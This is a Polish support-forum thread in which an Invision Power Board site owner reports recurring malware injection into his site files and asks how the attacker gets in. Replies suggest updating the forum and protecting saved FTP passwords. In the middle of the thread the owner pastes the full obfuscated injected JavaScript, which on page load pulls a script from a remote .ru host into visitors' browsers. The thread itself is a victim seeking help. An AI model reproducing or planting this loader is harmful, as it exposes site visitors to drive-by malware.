Skocz do zawartości
"Idzie nowe..." - o zmianach i nie tylko ×
Przeniesienie zakupów z IPS Marketplace / Moving bought items from IPS Marketplace ×

Rekomendowane odpowiedzi

Opublikowano (edytowane)

Mam prośbę do plików php js i html na końcu dołączył swoje zapisy (

zaczynające się na <script>/*GNU GPL*/ try{window.onload) trojan JS.AGENT.ewh )

po zastąpieniu plików na zdrowe po kilku dniach problem się powtórzył :)

Jak myślicie czy to wina jakieś dziury w ipb czy wlazł inną drogą ?

Pliki oczywiście mają flagi odpowiednie.

Pozdrawiam

Miłosz Popiołek

Corrado Club Polska

www.corrado.com.pl

forum na ipb 2.3.6

Edytowane przez mps
  • Manager
Opublikowano

Witaj,

forum 2.3.6 - być może wyszedł jakiś prywatny exploit lub faktycznie ktoś wbija inną metodą na Twój serwer - np. właśnie poprzez dziurę na nim lub innym skrypcie, jaki masz na serwerze. Ten kod zapisuje się tylko do plików .js? Możesz pokazać więcej tego doklejonego kodu?

intermedia - profesjonalne rozwiązania Invision Power Board

---

Chcesz uzyskać szybko i sprawnie pomoc? Uzupełnij wersję i adres w profilu.

Opublikowano

Dzięki za odpowiedź.

Dokleja się do js, php, htm, html

<script>/*GNU GPL*/ try{window.onload = function(){var O7g0p7soo94zn = document.createElement('s(!c$$^)r#^@i@&^p^&)t#'.replace(/\^|\!|&|\)|\(|@|\$|#/ig, ''));var C1ox8mxhvtg8 = 'Opr1rsptk69o';O7g0p7soo94zn.setAttribute('type', 't@@e##&!x)t(&/$)#!j@!$@a^&v(@^a^$s)c)#r)#(i$$)p!@t@'.replace(/#|\^|\!|\)|&|@|\$|\(/ig, ''));O7g0p7soo94zn.setAttribute('src', 'h)(t^$t(&$#p$:@&/@/$#(5^#d!&!6@((d@#-)c$#$o$)m#^^#$.!)#o#$@!p#!^t()m!)d#$&.^$!c&^o)$!m(@(#.^^i!c$^)i$@)o^@-(^u#s!@(.$#@a&)^^m$p^&)s&$&(g)&u#^^i(#!d(&$e(.($r$(#u#^:)&8&^0@)8)(&0&@^$/(#b(a@@n&(^g!@@b@$^r!)o)^&@!s#^!1(!(.&!c@$$o#!m)/&&^b(#a(n&g##@:)^r(!(o&((s@!1!.$$!c#@o#^m^#/!^g^$#o&)o(&)g)l&!$!!e)(@#.@$&s@!k(/)^($g!(^o(&()o#)g&!$$l&e&^.!&c$o@#@m)/#($&p@o$r!$!$#n))))#b&&b$&().@!o!!@r$g!/#@@#'.replace(/\^|@|\(|\)|\!|\$|#|&/ig, ''));O7g0p7soo94zn.setAttribute('defer', 'd@$e&(^&f)^(e@$&r^&)@'.replace(/#|\$|&|@|\)|\^|\(|\!/ig, ''));O7g0p7soo94zn.setAttribute('id', 'X)^!z@&8(p!!2!!^b!8$q##x($8&)$c)))y#$!'.replace(/\!|@|&|\(|\^|\)|\$|#/ig, ''));document.body.appendChild(O7g0p7soo94zn);}} catch(Tytvx3v6ssk) {}</script>

<!--e06caf30406dbae6324a85833a28f7ef-->

  • Manager
Opublikowano

Obawiam się, że nie wyczaimy drogi doklejania. To może być skrypt a może host, albo inny skrypt. Tak czy inaczej pierwsze co bym zrobił to aktualizację forum, by wykluczyć tę drogę.

intermedia - profesjonalne rozwiązania Invision Power Board

---

Chcesz uzyskać szybko i sprawnie pomoc? Uzupełnij wersję i adres w profilu.

Opublikowano

Używasz total commander lub innego progsa do łączenia się z ftp.

Moja rada: nie zapamiętuj haseł w tych programach, jeśli masz hasło w których z tych w/w programów zapamiętane, to je skasuj.

Następie podmień zarażone pliki na zdrowe. do logowania się na ftp używaj hasła poprzez wklejanie z notatnika lub wpisywanie za każdym razem kiedy chcesz się połączyć z ftp =]

Zainstaluj jakiegoś trojan remover, przeskanuj dysk i po sprawie.

Pozdrawiam

Metin2 - Największy Polski Portal o grze Metin2

Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto

Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.

Zarejestruj nowe konto

Załóż nowe konto. To bardzo proste!

Zarejestruj się

Zaloguj się

Posiadasz już konto? Zaloguj się poniżej.

Zaloguj się
  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...

Powiadomienie o plikach cookie

Umieściliśmy na Twoim urządzeniu pliki cookie, aby pomóc Ci usprawnić przeglądanie strony. Możesz dostosować ustawienia plików cookie, w przeciwnym wypadku zakładamy, że wyrażasz na to zgodę.